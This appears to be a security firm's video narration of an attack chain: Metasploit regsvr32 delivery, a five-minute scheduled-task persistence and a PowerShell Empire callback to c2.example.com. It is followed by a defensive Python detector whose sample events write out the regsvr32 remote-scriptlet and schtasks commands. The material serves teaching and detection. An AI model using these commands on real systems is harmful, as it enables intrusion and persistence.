In this video, Trenton Ivey, SecureWorks Security Analysis Consultant, gives a demonstration of how an attacker would initially compromise a system by creating a command and control server using the Metasploit framework and PowerShell Empire.
To learn more, watch the full webcast that features SecureWorks technical testers demonstrating and speaking about:
- Examples of real-world engagements
- Tactics and techniques commonly used to achieve their objectives
- Trends and weaknesses they are seeing in defenses
- Lessons learned
We will begin by creating a command and control server using the Metasploit framework and PowerShell Empire. First we'll use Metasploit to serve a file that, when used with regsvr32, will execute a command of our choice on the target system. For now, we'll leave the command option blank and run the module as a background job.
Metasploit provides us with a command that, when run, will cause a target system to connect to our server and execute the command that we specified. We'll copy this command and use it to build a new command. This new command will create a scheduled task that regularly runs the regsvr32 command provided by Metasploit.
This acts as a simple form of persistence. We will create a malicious binary that will run this command in the background as soon as it is executed. This gives us the ability to regularly send commands to our target system, but it isn't very interactive, so we'll use PowerShell Empire to get a more advanced shell.
In PowerShell Empire, we'll create a new listener that will wait for agents to connect to c2.example.com:8080. Next we'll create a launcher. Running this launcher, which is just a PowerShell script, will cause a target system to connect to our c2 and wait for further commands.
Finally, we'll set the PowerShell Empire launcher as our Metasploit command and then restart our server. In this scenario, we've sent our users a CD containing the malicious file. When they run the binary, it will prompt them to confirm that they are in fact an employee of ACME and that they have the appropriate authority to view the documents that the binary contains.
If they continue, it will provide them with a prompt that asks where they want to save the documents. Even further, if they run the extractor, it will extract a document that appears to be legitimate and is benign. However, as soon as the binary was run, our scheduled task command was executed, as evidenced here.
If we look at the task name, we can see that the task to run is our regsvr32 command and it's set to run every five minutes. When the scheduled task runs our command, we can see Metasploit handling the request from the regsvr32 command. This will load our PowerShell command, which should then connect to PowerShell Empire, and we can see an agent coming back in.
We can now interact with the agent and run things like sysinfo. This will send a command to the target system to pull back additional information about the system. I can see here that we're logged in on the CORP domain as the username mbishop. We can see that it's a laptop with the username mbishop. This is a good start.
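From the defender's side, the chain shown above leaves two distinct traces in process-creation telemetry: a scheduled task whose action is regsvr32, and regsvr32 itself fetching its script from a URL on a fixed cadence. The following is an added example, not code from the video or from SecureWorks; the Sysmon-style event records, host name, task name and URL are constructed for illustration.

```python
"""Spot the regsvr32 + scheduled-task persistence chain in process-creation logs."""
import re
from datetime import datetime

# regsvr32 /i: pointing at an http(s) URL loads its scriptlet from the network (T1218.010)
RE_REMOTE_I = re.compile(r"/i:\s*https?://", re.I)
# schtasks creating a task (T1053.005); the cadence is read from "/sc minute /mo N"
RE_TASK_CREATE = re.compile(r"\bschtasks(?:\.exe)?\b.*\s/create\b", re.I)
RE_MINUTE_CADENCE = re.compile(r"/sc\s+minute\s+/mo\s+(\d+)", re.I)

def exe_name(path):
    return path.lower().rsplit("\\", 1)[-1]

def classify_event(ev):
    """Return the rule names an event triggers (empty list if nothing matched)."""
    hits, cmd, image = [], ev["cmd"], exe_name(ev["image"])
    if image == "regsvr32.exe" and RE_REMOTE_I.search(cmd):
        hits.append("T1218.010 regsvr32 loading remote scriptlet")
    if image == "schtasks.exe" and RE_TASK_CREATE.search(cmd) and "regsvr32" in cmd.lower():
        m = RE_MINUTE_CADENCE.search(cmd)
        hits.append("T1053.005 scheduled task running regsvr32" + (f" every {m.group(1)} min" if m else ""))
    return hits

def beaconing_hosts(events, tolerance_s=30, min_runs=3):
    """Map host -> average interval (s) where remote-scriptlet regsvr32 runs recur evenly."""
    by_host = {}
    for ev in events:
        if exe_name(ev["image"]) == "regsvr32.exe" and RE_REMOTE_I.search(ev["cmd"]):
            by_host.setdefault(ev["host"], []).append(datetime.fromisoformat(ev["t"]))
    result = {}
    for host, times in by_host.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if len(times) >= min_runs and max(gaps) - min(gaps) <= tolerance_s:
            result[host] = round(sum(gaps) / len(gaps))
    return result

def scan(events):
    """Flatten all rule hits into (timestamp, host, rule) tuples."""
    return [(ev["t"], ev["host"], h) for ev in events for h in classify_event(ev)]

# Constructed Sysmon Event ID 1 style records (field names are assumptions, not Sysmon's own)
C2 = "http://c2.example.com:8080/launcher.sct"
RUN = f"regsvr32.exe /s /n /u /i:{C2} scrobj.dll"
SAMPLE_EVENTS = [
    {"t": "2016-06-01T09:00:02", "host": "LAPTOP01", "image": "C:\\Windows\\System32\\schtasks.exe",
     "cmd": f'schtasks.exe /create /sc minute /mo 5 /tn ACMEDocs /tr "{RUN}"'},
    {"t": "2016-06-01T09:01:00", "host": "LAPTOP01", "image": "C:\\Windows\\System32\\regsvr32.exe",
     "cmd": "regsvr32.exe /s C:\\Program Files\\Vendor\\vendor.dll"},  # benign local registration
] + [{"t": f"2016-06-01T09:{m:02d}:05", "host": "LAPTOP01",
      "image": "C:\\Windows\\System32\\regsvr32.exe", "cmd": RUN} for m in (5, 10, 15)]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
    print(beaconing_hosts(SAMPLE_EVENTS))  # {'LAPTOP01': 300}
```

The benign local DLL registration produces no hit, while the three network-loading runs five minutes apart surface both as individual rule matches and as a 300-second cadence on the host.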